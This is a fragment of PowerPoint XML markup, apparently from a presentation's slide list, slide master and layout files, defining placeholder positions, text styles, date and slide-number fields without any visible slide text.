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 id="2147483804" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="269" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
  </p:sldIdLst>
  <p:sldSz cx="123444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B69E15-5FB9-45FA-96E4-3062C34E80C3}" v="4" dt="2023-11-12T02:31:15.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66" y="11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43050" y="1122363"/>
            <a:ext cx="92583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43050" y="3602038"/>
            <a:ext cx="9258300" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743173" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200368" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365756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64BC52-4418-402E-97E2-D20C73BD44C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883077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64BC52-4418-402E-97E2-D20C73BD44C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48434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3962" y="365125"/>
            <a:ext cx="266176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48678" y="365125"/>
            <a:ext cx="783097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64BC52-4418-402E-97E2-D20C73BD44C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3808615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 y="-1"/>
            <a:ext cx="123444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3"/>
            <a:ext cx="2333864"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99880" y="1122363"/>
            <a:ext cx="8901470"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99880" y="3602038"/>
            <a:ext cx="8901470" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743173" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200368" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365756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165980" y="5410204"/>
            <a:ext cx="2777490" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D964BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/14/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899880" y="5410204"/>
            <a:ext cx="5188947" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10020623" y="5410202"/>
            <a:ext cx="780728" cy="365125"/>
          </a:xfrm>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51394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64BC52-4418-402E-97E2-D20C73BD44C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3920737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679" y="1419229"/>
            <a:ext cx="10029825"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5679" y="4424362"/>
            <a:ext cx="10029825" cy="1374776"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743173" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200368" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365756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64BC52-4418-402E-97E2-D20C73BD44C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4254755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5678" y="2249486"/>
            <a:ext cx="493936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9353" y="2249486"/>
            <a:ext cx="493615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64BC52-4418-402E-97E2-D20C73BD44C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3613352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5679" y="619129"/>
            <a:ext cx="10029825"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87146" y="2249486"/>
            <a:ext cx="4707905" cy="823912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155678" y="3073400"/>
            <a:ext cx="493937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80818" y="2249485"/>
            <a:ext cx="4704685" cy="823912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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354" y="3073400"/>
            <a:ext cx="493615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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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4197640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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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2415919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4BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/14/2023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34131152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61041" y="609601"/>
            <a:ext cx="39042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20653" y="592666"/>
            <a:ext cx="596484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61041" y="2249486"/>
            <a:ext cx="3904237" cy="3541714"/>
          </a:xfr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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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117769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64BC52-4418-402E-97E2-D20C73BD44C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215784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682" y="609600"/>
            <a:ext cx="6008689"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72981" y="609604"/>
            <a:ext cx="3712524"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55678" y="2249486"/>
            <a:ext cx="6008692" cy="3541714"/>
          </a:xfr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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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3593390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679" y="4304667"/>
            <a:ext cx="10036259"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5679" y="606426"/>
            <a:ext cx="10036258"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55632" y="5124020"/>
            <a:ext cx="10034745" cy="682472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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3692590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5726" y="609600"/>
            <a:ext cx="10029779"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55679" y="4419602"/>
            <a:ext cx="10028265" cy="1371599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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18972225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64290" y="609602"/>
            <a:ext cx="9419036"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42153" y="3365557"/>
            <a:ext cx="8861703" cy="548968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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55679" y="4309919"/>
            <a:ext cx="10029827" cy="1489496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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33C32-7247-472B-A5E2-E7807DFFAF5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="TextBox 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914806" y="732394"/>
            <a:ext cx="61722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669087" y="2764972"/>
            <a:ext cx="61722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26570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5679" y="2134044"/>
            <a:ext cx="10029826"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55633" y="4657655"/>
            <a:ext cx="10028311" cy="1140644"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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41700799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55681" y="609600"/>
            <a:ext cx="10029823"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55679" y="2674463"/>
            <a:ext cx="3236860" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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42019" y="3360263"/>
            <a:ext cx="3248844" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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71201" y="2677635"/>
            <a:ext cx="3224190" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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60516" y="3363435"/>
            <a:ext cx="3235778" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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50599" y="2674463"/>
            <a:ext cx="3234905" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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50599" y="3360263"/>
            <a:ext cx="3234905" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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1108887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55680" y="609600"/>
            <a:ext cx="10029824"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55680" y="4404596"/>
            <a:ext cx="3235181" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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55680" y="2666998"/>
            <a:ext cx="3235181"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55680" y="4980861"/>
            <a:ext cx="3235181" cy="817843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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45167" y="4404596"/>
            <a:ext cx="3240405" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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167" y="2666998"/>
            <a:ext cx="32389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543689" y="4980857"/>
            <a:ext cx="3240405" cy="810342"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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50726" y="4404595"/>
            <a:ext cx="3230625" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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50598" y="2666998"/>
            <a:ext cx="3234906"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950599" y="4980857"/>
            <a:ext cx="3234905" cy="810345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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35500996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64BC52-4418-402E-97E2-D20C73BD44C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21226670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55430" y="609602"/>
            <a:ext cx="203007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55679" y="609602"/>
            <a:ext cx="7845447"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64BC52-4418-402E-97E2-D20C73BD44C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1358095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2249" y="1709741"/>
            <a:ext cx="1064704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42249" y="4589466"/>
            <a:ext cx="10647045" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457196" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914391" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371587" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828782" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743173" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200368" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365756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64BC52-4418-402E-97E2-D20C73BD44C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159468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8678" y="1825625"/>
            <a:ext cx="524637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9353" y="1825625"/>
            <a:ext cx="524637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64BC52-4418-402E-97E2-D20C73BD44C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585202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0286" y="365128"/>
            <a:ext cx="1064704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0287" y="1681163"/>
            <a:ext cx="5222259" cy="82391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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850287" y="2505075"/>
            <a:ext cx="522225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9352" y="1681163"/>
            <a:ext cx="5247978" cy="82391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352" y="2505075"/>
            <a:ext cx="524797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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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369810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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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4002757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4BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/14/2023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1900708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0286" y="457200"/>
            <a:ext cx="3981390"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47979" y="987428"/>
            <a:ext cx="624935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0286" y="2057400"/>
            <a:ext cx="3981390" cy="3811588"/>
          </a:xfr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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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3884787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0286" y="457200"/>
            <a:ext cx="3981390"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7979" y="987428"/>
            <a:ext cx="6249353" cy="4873625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>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0286" y="2057400"/>
            <a:ext cx="3981390" cy="3811588"/>
          </a:xfr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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285978"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64BC52-4418-402E-97E2-D20C73BD44C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33C32-7247-472B-A5E2-E7807DFFAF5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1108022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8678" y="365128"/>
            <a:ext cx="1064704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8678" y="1825625"/>
            <a:ext cx="1064704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48678" y="6356353"/>
            <a:ext cx="277749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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/14/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089083" y="6356353"/>
            <a:ext cx="416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18233" y="6356353"/>
            <a:ext cx="27774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033C32-7247-472B-A5E2-E7807DFFAF5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143786216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3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7"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8" indent="-228597"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4" indent="-228597"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9" indent="-228597"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5" indent="-228597"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0" indent="-228597"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6" indent="-228597"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1" indent="-228597"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2" y="-1"/>
            <a:ext cx="123444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467" y="3"/>
            <a:ext cx="12204562"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55681" y="618518"/>
            <a:ext cx="10029823"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55681" y="2249487"/>
            <a:ext cx="10029824"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133" y="5883279"/>
            <a:ext cx="27774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64BC52-4418-402E-97E2-D20C73BD44CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/14/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155679" y="5883278"/>
            <a:ext cx="6317300"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04775" y="5883277"/>
            <a:ext cx="780728"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9033C32-7247-472B-A5E2-E7807DFFAF5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3467596534"/>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l" defTabSz="914391"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597" indent="-228597" algn="l" defTabSz="914391"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793" indent="-228597" algn="l" defTabSz="914391"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2988" indent="-228597" algn="l" defTabSz="914391"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184" indent="-228597" algn="l" defTabSz="91439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379" indent="-228597" algn="l" defTabSz="91439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575" indent="-228597" algn="l" defTabSz="91439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770" indent="-228597" algn="l" defTabSz="91439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8966" indent="-228597" algn="l" defTabSz="91439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161" indent="-228597" algn="l" defTabSz="91439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4DCE7-FA99-549A-D332-377AEADD6D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
